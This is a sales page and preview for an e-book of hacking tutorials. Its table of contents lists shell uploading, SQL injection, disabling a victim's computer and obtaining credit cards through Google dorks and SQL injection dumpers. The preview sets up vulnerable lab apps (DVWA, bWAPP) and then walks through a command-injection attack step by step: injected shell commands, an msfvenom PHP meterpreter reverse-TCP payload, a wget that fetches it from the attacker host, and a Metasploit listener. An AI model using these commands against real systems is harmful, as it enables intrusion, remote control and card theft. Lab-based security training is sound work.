13,99 €
The objective of this work is to provide some quick tutorials in computer networking hacking.
The work includes the following tutorials:
Das E-Book können Sie in Legimi-Apps oder einer beliebigen App lesen, die das folgende Format unterstützen:
By
Dr. Hidaia Mahmood Alassouli
The objective of this work is to provide some quick tutorials in computer networking hacking.
The work includes the following tutorials:
Tutorial 1: Setting Up Penetrating Tutorial in Linux.
Tutorial 2: Setting Up Penetrating Tutorial in Windows.
Tutorial 3: OS Command Injection:
Tutorial 4: Basic SQL Injection Commands.
Tutorial 5: Manual SQL injection using order by and union select technique.
Tutorial 6: Damping SQL Tables and Columns Using the SQL Injection.
Tutorial 7: Uploading Shell in the Site having LFI.
Tutorial 8: Advanced Way for Uploading Shell
Tutorial 9: Uploading shell Using Sqli Command.
Tutorial 10: Uploading Shell Using SQLmap
Tutorial 11: Post Based SQL Injection
Tutorial 12: Cracking the Hashes
Using
Hashcat.
Tutorial 13: Hacking windows 7 and 8 through
Metasploite
Tutorial 14: Tutorial on Cross Site Scripting
Tutorial 15: Hacking Android Mobile Using Metasploit
Tutorial 16: Man of the middle attack:
Tutorial 17: Using SQLmap for SQL injection
Tutorial 18: Hide Your
Ip
Tutorial 19: Uploading Shell and Payloads Using
SQLmap
Tutorial 20: Using Sql Shell in SQLmap
Tutorial 21: Blind SQL Injection
Tutorial 22: Jack Hridoy SQL Injection Solution
Tutorial 23: Using Hydra to Get the Password
Tutorial 24: Finding the phpmyadmin page using websploit.
Tutorial 25: How to root the server using back connect
Tutorial 25: How to root the server using back connect
Tutorial 26: HTML Injection
Tutorial 27: Tutuorial in manual SQl Injection
Tutorial 28: Venom psh-cmd-exe payload
Tutorial 29: Cross site Request Forgery (CSRF)
Tutorial 30: Disable Victim Computer
Tutorial 31: Exploit any firefox
by
xpi_bootstrapped addon
Tutorial 32: Hack android mobile with metasploit
Tutorial 33: PHP Code Injection to Meterpreter Session
Tutorial 34: Basic google operators
Tutorial 35: Hacking Credit Cards with google
Tutorial 36: Finding Vulnerable Websites in Google
Tutorial 37: Using the httrack to download website
Tutorial 38: Getting the credit cards using sql injection and the SQLi dumper
Tutorial 39: Using burp suite to brute force password
Note: a lot of tutorials taken from the Pentesting with spirit!Youtube web site https://www.youtube.com/channel/UC_bzikURwRp3Vdbl3VL959Q
Download the files from the following links
The downloaded files are the following:
Unzip all files using the command unzip
Move all extracted folders to the directory /var/www. But rename the folders first
If you get problem in mysql console, reset the root user
sudo /etc/init.d/mysql stop
mysqld_safe --skip-grant-tables &
mysql -uroot
update user set password=PASSWORD("mynewpassword") where User='root';
flush privileges;
quit
sudo /etc/init.d/mysql stop
...
sudo /etc/init.d/mysql start
mysql -u root -p
Check the configuration files of of the labs. Browse the owasp (mutillidae).
# cd owasp
#cd webservices
It is configured
7. Go to dvwa directory
# cd dvwa
# gedit config.inc.php
Change the db_password to be empty
8. Start the services
# service apache2 start
# service mysql start
9. Go to 127.0.0.1/sqli and build the databases
10. Go to 127.0.0.1/dvwa and logon with user admin and password password. Create the databases from setup section
11. Go to 127.0.0.1/bwapp/install.php and logon with user bee and password bug. Create the databases.
Go to 127.0.0.1/sqli and build the databases
Go to 127.0.0.1/dvwa and logon with user admin and password password. Create the databases from setup section
Go to 127.0.0.1/bwapp/install.php and logon with user bee and password bug. Create the databases.
Goto link for testing command injection
http://192.168.52.139/vulnerabilities/exec/
Write in the form some commands
; ls
;pwd
Generate payload with msfvenom
Msfvenom –p php/meterpreter/reverse_tcp LHOST=192.168.52.135 LPORT=1234 –e php/base64 –f raw >/root/spirit1.php
Modify the generated file apirit1.php to add <?php
?> at the beginning and end of file.
Start the http service using python command
Python –m SimpleHTTPServer 80
Write in the command execution form the following command
;wget http://192.168.52.135/spirit3.php
To exploit it, open the terminal in hacker computer
#msfconsole
Msf> use exploit/multi/handler
Msf> set LHOST 192.168.52.135
Msf> set LPORT 1234
Msf> set payload php/meterpreter/reverse_tcp
Msf> exploit
In the command execution form, run the shell by writing
;php –f spirit3.php